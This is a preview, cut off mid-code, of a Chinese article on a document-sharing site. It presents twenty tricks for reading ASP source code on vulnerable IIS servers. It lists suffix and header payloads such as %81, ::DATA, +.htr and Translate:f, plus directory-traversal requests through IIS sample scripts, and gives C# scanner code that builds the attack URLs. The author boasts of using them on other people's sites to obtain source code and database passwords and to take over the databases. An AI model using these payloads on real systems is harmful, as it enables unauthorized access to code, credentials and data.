返回
查看asp源码的技巧分享

查看asp源码的技巧分享

ID:8562916

大小:27.50 KB

页数:11页

时间:2018-04-01

查看asp源码的技巧分享_第1页
查看asp源码的技巧分享_第2页
查看asp源码的技巧分享_第3页
查看asp源码的技巧分享_第4页
查看asp源码的技巧分享_第5页
资源描述:

《查看asp源码的技巧分享》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、查看asp源码的技巧分享本文一共提供了二十种查看ASP源码的方法给大家分享,希望对大家有帮助。众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20种看asp源码的方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sqlserver的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网络库连接到数据库,为所欲为呀。先面把这20种方法列在下面: .  %81  ::DATA  %2

2、e  %2e%41sp  +.htr  \  longhtr  .bak              search/  search/    .htw  Translate:f  上边这些漏洞前面10几条是通过在asp文件后直接加上,如%81就是%81,后面这些都是通过iis自带的例子或系统漏洞实现的,最特别的是那种translate:f方法,它直接通过浏览器是无法使用的,必须同服务器建立tcp/ip的socket连接,发送请求才行,具体每个漏洞如何使用,看下面,这是我那个应用程序的一部分,如果你要全部的可以到我的站点去下载。  switch()  {  case0://直接读

3、取  strRequestFile=strServer+strUrl;  break;  case5://%2e%41sp  strRequestFile=strServer+strPath+strFirst  +“%2e%41sp”;  break;  case8://longhtr  strRequestFile=strServer+strUrl  +“+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%”  +“20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%”  +“20%2

4、0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%2

5、0%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20”  +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20” 

6、 +“%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%”;  break;    case10://  strRequestFile=strServer+“/iissamples/exair/howitworks/?source=“  +strUrl;  break;    case11://  strRequestFile=strServer+“/iissamples/exair/howitworks/?source=“  +“/msadc/../../../../”;  break;    case12://  strReques

7、tFile=strServer+“/?CiWebHitsFile=“  +strUrl+“%20&CiRestriction=none&CiHiliteType=Full”;  break;  case13://  strRequestFile=strServer+“/iissamples/issamples/oop/?”  +“CiWebHitsFile=/../../&CiRestriction=none”  +“&CiHiliteType=Full”;  break;    case1

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。